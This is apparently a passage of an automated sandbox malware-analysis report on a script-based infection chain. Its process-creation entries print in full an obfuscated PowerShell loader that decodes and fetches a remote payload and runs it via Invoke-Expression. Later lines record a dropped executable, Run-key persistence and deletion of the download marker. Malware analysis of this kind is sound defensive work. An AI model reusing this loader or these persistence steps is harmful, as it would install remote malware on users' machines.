DiManRltCoMMiakonhea .g.neThrSu]Or:In:.eSFueAlc u arSti St,eyLaPRur no ntC oalcMio.olS ,r=Ke Ly[PrN Se ,t ,.SpS .e .cDeu,tr NiSet DyRoPBir OoBitTeoCocLso ulKaTT.y op e.l],o:Fo:SyTSkls,sb 1Tj2H ');$Impossible236=$Stadioners[0];$Cottonopolis= (Lecithalbumin 'In$lig.dlL.o LbOraJal L:PrU,nt ,y,opKoi s.rkP,eTisP.=flN.geFiw ,-OuOD bn j,neDicw.t a M,S RyDrsRet,eeP.m ..LiNYneRatS,.L,W,aeRobFoCF lRei ,eSlnC,t');$Cottonopolis+=$Diacodion125[1];Rysters Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unscrambles Islndingers198 Fetichdyrkernes Stadioners Impossible236 manhunts Counterpropagations Regnestokkene Arbejdsdelings Reactualizations maurernes fodrodsknoglerne Fjerntboendes247 Periangiocholitis103 Cykelkdernes Alisphenoid Hispidity Velplejede Noggings Mntvaskeriernes uskadeliggjort Isoptic Aminoketone housemaidenly Unscrambles Islndingers198 Fetichdyrkernes Stadioners Impossible236 manhunts Counterpropagations Regnestokkene Arbejdsdelings Reactualizations maurernes fodrodsknoglerne Fjerntboendes247 Periangiocholitis103 Cykelkdernes Alisphenoid Hispidity Velplejede Noggings Mntvaskeriernes uskadeliggjort Isoptic Aminoketone housemaidenly';If (${host}.CurrentCulture) {$cyperaceous++;}Function Lecithalbumin($Transfusionskanylerne){$tysklandsrejse=$Transfusionskanylerne.Length-$cyperaceous;$Undersupplied='SUBsTRI';$Undersupplied+='ng';For( $Elisioner=2;$Elisioner -lt $tysklandsrejse;$Elisioner+=3){$Unscrambles+=$Transfusionskanylerne.$Undersupplied.Invoke( $Elisioner, $cyperaceous);}$Unscrambles;}function Rysters($Baksningers){ & ($Datolinjerne) ($Baksningers);}$Eftersprgslens107=Lecithalbumin 'VkMNoo oz Mi.nl Nl ea.i/ .5Fj.G.0 m E.(PhW ,i Sn.edFao SwUms F ,N,aT S Su1,u0H .Cy0in;ov A,W oiT,nL,6Tr4Va;O. OsxGa6Do4d ;Cl Cor EvSe: S1,i2Ne1Re. e0Pl)Pe .dGE eStcBak Ho ,/ V2Sa0Dy1Th0 .0Me1Om0 .1fo RoFAri rBeePifvaoadxK,/af1re2 i1.c.Ad0Se ';$Mottolike90=Lecithalbumin 'GeUL.sPheSurLu- .A .g BeS.nAptRu ';$Impossible236=Lecithalbumin ',ahCat ntHepP.s U:Ug/ C/ SdEnrPliSmv,eeIn.,ag AoDaoDjg ,lThe A.F cEnoDimUf/SyuDacHo?,oe IxUnpEpoKarN.tFo=U dXxo MwUnnSylJooEpaG,dTh&Bui ,d h=in1,cySuz eBaOA RZilReWP dCoW .KAtE S1Gu5 eSpn,o4T vgl7Cat u0Pay.ymalp.l9Bl6 DmcrbTr-ArKBrlKrURuQ u ';$Oversocially=Lecithalbumin 'Re>Br ';$Datolinjerne=Lecithalbumin ' Gi Bea,x F ';$Biles='Regnestokkene';$ekstemporeringernes = Lecithalbumin 'MieLocBrhElo,f do%Pea,up apM d .a,ptsoaIt%,u\PoRPiuB,n.ad,ktS,e .nCoo.fmSemHye r E.AtR Uh Dy S K& .&Mi ReRecGlhBroPe T tHo ';Rysters (Lecithalbumin '.r$e.g AlBlo mbTia AlU.: BDUni ,a DcVao .dSyiSioB nVa1Sm2K.5 u=St(YecT.mHedPo P/.ycTe Te$,ae Sk.osKotAneUrm ip,noP r,eeSjrReiD,n agPrePsr tnS.eD.sR.)Po ');Rysters (Lecithalbumin 'Fo$IngG,lStoT.bS.aexl.l:AlSnotSoag d .iBro RnCee lr sMo=,e$brI im.epUnoNosAfsBriHeb Pl.oeDa2Ud3 ,6Ga.Scs Rp Dl,hiret T(L.$BeO PvC,e SrResVioHjc PiFeaE.lKll CyU.) G ');Rysters (Lecithalbumin 'M.[ eNV,eSctKa.JuS beSmrPivEsiPoc Ge TP mo DiManRltCoMMiakonhea .g.neThrSu]Or:In:.eSFueAlc u arSti St,eyLaPRur no ntC oalcMio.olS ,r=Ke Ly[PrN Se ,t ,.SpS .e .cDeu,tr NiSet DyRoPBir OoBitTeoCocLso ulKaTT.y op e.l],o:Fo:SyTSkls,sb 1Tj2H ');$Impossible236=$Stadioners[0];$Cottonopolis= (Lecithalbumin 'In$lig.dlL.o LbOraJal L:PrU,nt ,y,opKoi s.rkP,eTisP.=flN.geFiw ,-OuOD bn j,neDicw.t a M,S RyDrsRet,eeP.m ..LiNYneRatS,.L,W,aeRobFoCF lRei ,eSlnC,t');$Cottonopolis+=$Diacodion125[1];Rysters
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unscrambles Islndingers198 Fetichdyrkernes Stadioners Impossible236 manhunts Counterpropagations Regnestokkene Arbejdsdelings Reactualizations maurernes fodrodsknoglerne Fjerntboendes247 Periangiocholitis103 Cykelkdernes Alisphenoid Hispidity Velplejede Noggings Mntvaskeriernes uskadeliggjort Isoptic Aminoketone housemaidenly Unscrambles Islndingers198 Fetichdyrkernes Stadioners Impossible236 manhunts Counterpropagations Regnestokkene Arbejdsdelings Reactualizations maurernes fodrodsknoglerne Fjerntboendes247 Periangiocholitis103 Cykelkdernes Alisphenoid Hispidity Velplejede Noggings Mntvaskeriernes uskadeliggjort Isoptic Aminoketone housemaidenly';If (${host}.CurrentCulture) {$cyperaceous++;}Function Lecithalbumin($Transfusionskanylerne){$tysklandsrejse=$Transfusionskanylerne.Length-$cyperaceous;$Undersupplied='SUBsTRI';$Undersupplied+='ng';For( $Elisioner=2;$Elisioner -lt $tysklandsrejse;$Elisioner+=3){$Unscrambles+=$Transfusionskanylerne.$Undersupplied.Invoke( $Elisioner, $cyperaceous);}$Unscrambles;}function Rysters($Baksningers){ & ($Datolinjerne) ($Baksningers);}$Eftersprgslens107=Lecithalbumin 'VkMNoo oz Mi.nl Nl ea.i/ .5Fj.G.0 m E.(PhW ,i Sn.edFao SwUms F ,N,aT S Su1,u0H .Cy0in;ov A,W oiT,nL,6Tr4Va;O. OsxGa6Do4d ;Cl Cor EvSe: S1,i2Ne1Re. e0Pl)Pe .dGE eStcBak Ho ,/ V2Sa0Dy1Th0 .0Me1Om0 .1fo RoFAri rBeePifvaoadxK,/af1re2 i1.c.Ad0Se ';$Mottolike90=Lecithalbumin 'GeUL.sPheSurLu- .A .g BeS.nAptRu ';$Impossible236=Lecithalbumin ',ahCat ntHepP.s U:Ug/ C/ SdEnrPliSmv,eeIn.,ag AoDaoDjg ,lThe A.F cEnoDimUf/SyuDacHo?,oe IxUnpEpoKarN.tFo=U dXxo MwUnnSylJooEpaG,dTh&Bui ,d h=in1,cySuz eBaOA RZilReWP dCoW .KAtE S1Gu5 eSpn,o4T vgl7Cat u0Pay.ymalp.l9Bl6 DmcrbTr-ArKBrlKrURuQ u ';$Oversocially=Lecithalbumin 'Re>Br ';$Datolinjerne=Lecithalbumin ' Gi Bea,x F ';$Biles='Regnestokkene';$ekstemporeringernes = Lecithalbumin 'MieLocBrhElo,f do%Pea,up apM d .a,ptsoaIt%,u\PoRPiuB,n.ad,ktS,e .nCoo.fmSemHye r E.AtR Uh Dy S K& .&Mi ReRecGlhBroPe T tHo ';Rysters (Lecithalbumin '.r$e.g AlBlo mbTia AlU.: BDUni ,a DcVao .dSyiSioB nVa1Sm2K.5 u=St(YecT.mHedPo P/.ycTe Te$,ae Sk.osKotAneUrm ip,noP r,eeSjrReiD,n agPrePsr tnS.eD.sR.)Po ');Rysters (Lecithalbumin 'Fo$IngG,lStoT.bS.aexl.l:AlSnotSoag d .iBro RnCee lr sMo=,e$brI im.epUnoNosAfsBriHeb Pl.oeDa2Ud3 ,6Ga.Scs Rp Dl,hiret T(L.$BeO PvC,e SrResVioHjc PiFeaE.lKll CyU.) G ');Rysters (Lecithalbumin 'M.[ eNV,eSctKa.JuS beSmrPivEsiPoc Ge TP mo DiManRltCoMMiakonhea .g.neThrSu]Or:In:.eSFueAlc u arSti St,eyLaPRur no ntC oalcMio.olS ,r=Ke Ly[PrN Se ,t ,.SpS .e .cDeu,tr NiSet DyRoPBir OoBitTeoCocLso ulKaTT.y op e.l],o:Fo:SyTSkls,sb 1Tj2H ');$Impossible236=$Stadioners[0];$Cottonopolis= (Lecithalbumin 'In$lig.dlL.o LbOraJal L:PrU,nt ,y,opKoi s.rkP,eTisP.=flN.geFiw ,-OuOD bn j,neDicw.t a M,S RyDrsRet,eeP.m ..LiNYneRatS,.L,W,aeRobFoCF lRei ,eSlnC,t');$Cottonopolis+=$Diacodion125[1];Rysters
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unscrambles Islndingers198 Fetichdyrkernes Stadioners Impossible236 manhunts Counterpropagations Regnestokkene Arbejdsdelings Reactualizations maurernes fodrodsknoglerne Fjerntboendes247 Periangiocholitis103 Cykelkdernes Alisphenoid Hispidity Velplejede Noggings Mntvaskeriernes uskadeliggjort Isoptic Aminoketone housemaidenly Unscrambles Islndingers198 Fetichdyrkernes Stadioners Impossible236 manhunts Counterpropagations Regnestokkene Arbejdsdelings Reactualizations maurernes fodrodsknoglerne Fjerntboendes247 Periangiocholitis103 Cykelkdernes Alisphenoid Hispidity Velplejede Noggings Mntvaskeriernes uskadeliggjort Isoptic Aminoketone housemaidenly';If (${host}.CurrentCulture) {$cyperaceous++;}Function Lecithalbumin($Transfusionskanylerne){$tysklandsrejse=$Transfusionskanylerne.Length-$cyperaceous;$Undersupplied='SUBsTRI';$Undersupplied+='ng';For( $Elisioner=2;$Elisioner -lt $tysklandsrejse;$Elisioner+=3){$Unscrambles+=$Transfusionskanylerne.$Undersupplied.Invoke( $Elisioner, $cyperaceous);}$Unscrambles;}function Rysters($Baksningers){ & ($Datolinjerne) ($Baksningers);}$Eftersprgslens107=Lecithalbumin 'VkMNoo oz Mi.nl Nl ea.i/ .5Fj.G.0 m E.(PhW ,i Sn.edFao SwUms F ,N,aT S Su1,u0H .Cy0in;ov A,W oiT,nL,6Tr4Va;O. OsxGa6Do4d ;Cl Cor EvSe: S1,i2Ne1Re. e0Pl)Pe .dGE eStcBak Ho ,/ V2Sa0Dy1Th0 .0Me1Om0 .1fo RoFAri rBeePifvaoadxK,/af1re2 i1.c.Ad0Se ';$Mottolike90=Lecithalbumin 'GeUL.sPheSurLu- .A .g BeS.nAptRu ';$Impossible236=Lecithalbumin ',ahCat ntHepP.s U:Ug/ C/ SdEnrPliSmv,eeIn.,ag AoDaoDjg ,lThe A.F cEnoDimUf/SyuDacHo?,oe IxUnpEpoKarN.tFo=U dXxo MwUnnSylJooEpaG,dTh&Bui ,d h=in1,cySuz eBaOA RZilReWP dCoW .KAtE S1Gu5 eSpn,o4T vgl7Cat u0Pay.ymalp.l9Bl6 DmcrbTr-ArKBrlKrURuQ u ';$Oversocially=Lecithalbumin 'Re>Br ';$Datolinjerne=Lecithalbumin ' Gi Bea,x F ';$Biles='Regnestokkene';$ekstemporeringernes = Lecithalbumin 'MieLocBrhElo,f do%Pea,up apM d .a,ptsoaIt%,u\PoRPiuB,n.ad,ktS,e .nCoo.fmSemHye r E.AtR Uh Dy S K& .&Mi ReRecGlhBroPe T tHo ';Rysters (Lecithalbumin '.r$e.g AlBlo mbTia AlU.: BDUni ,a DcVao .dSyiSioB nVa1Sm2K.5 u=St(YecT.mHedPo P/.ycTe Te$,ae Sk.osKotAneUrm ip,noP r,eeSjrReiD,n agPrePsr tnS.eD.sR.)Po ');Rysters (Lecithalbumin 'Fo$IngG,lStoT.bS.aexl.l:AlSnotSoag d .iBro RnCee lr sMo=,e$brI im.epUnoNosAfsBriHeb Pl.oeDa2Ud3 ,6Ga.Scs Rp Dl,hiret T(L.$BeO PvC,e SrResVioHjc PiFeaE.lKll CyU.) G ');Rysters (Lecithalbumin 'M.[ eNV,eSctKa.JuS beSmrPivEsiPoc Ge TP mo DiManRltCoMMiakonhea .g.neThrSu]Or:In:.eSFueAlc u arSti St,eyLaPRur no ntC oalcMio.olS ,r=Ke Ly[PrN Se ,t ,.SpS .e .cDeu,tr NiSet DyRoPBir OoBitTeoCocLso ulKaTT.y op e.l],o:Fo:SyTSkls,sb 1Tj2H ');$Impossible236=$Stadioners[0];$Cottonopolis= (Lecithalbumin 'In$lig.dlL.o LbOraJal L:PrU,nt ,y,opKoi s.rkP,eTisP.=flN.geFiw ,-OuOD bn j,neDicw.t a M,S RyDrsRet,eeP.m ..LiNYneRatS,.L,W,aeRobFoCF lRei ,eSlnC,t');$Cottonopolis+=$Diacodion125[1];Rysters Jump to behavior
Source: ysaPFN.exe.21.dr Static PE information: 0x853858FE [Sun Oct 28 18:42:06 2040 UTC]
Source: ysaPFN.exe.21.dr Static PE information: section name: .didat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 15_2_00007FFAAC335479 push ebp; iretd 15_2_00007FFAAC335538
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_0447EC78 pushfd ; retf 19_2_0447EC79
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_07161FB2 push eax; mov dword ptr [esp], ecx 19_2_071621B4
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\ysaPFN\ysaPFN.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ysaPFN Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ysaPFN Jump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\ysaPFN\ysaPFN.exe:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
